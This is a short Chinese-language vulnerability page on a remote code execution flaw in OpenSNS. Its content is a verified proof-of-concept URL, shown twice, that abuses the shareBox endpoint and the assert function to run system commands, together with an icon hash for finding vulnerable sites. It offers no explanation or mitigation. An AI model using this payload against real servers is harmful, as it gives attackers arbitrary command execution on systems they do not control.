# OpenSNS 遠程代碼執行漏洞
{| style=”margin: auto; width: 750px;color:green;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Check.png|50px]]
| 該漏洞已通過驗證。
|
|
|}
|}
icon_hash="1167011145"
==POC==
http:///index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)
{| style=”margin: auto; width: 750px;color:green;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Check.png|50px]]
| 該漏洞已通過驗證。
|
|
|}
|}
經過測試,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。
icon_hash="1167011145"
==POC==
http:///index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容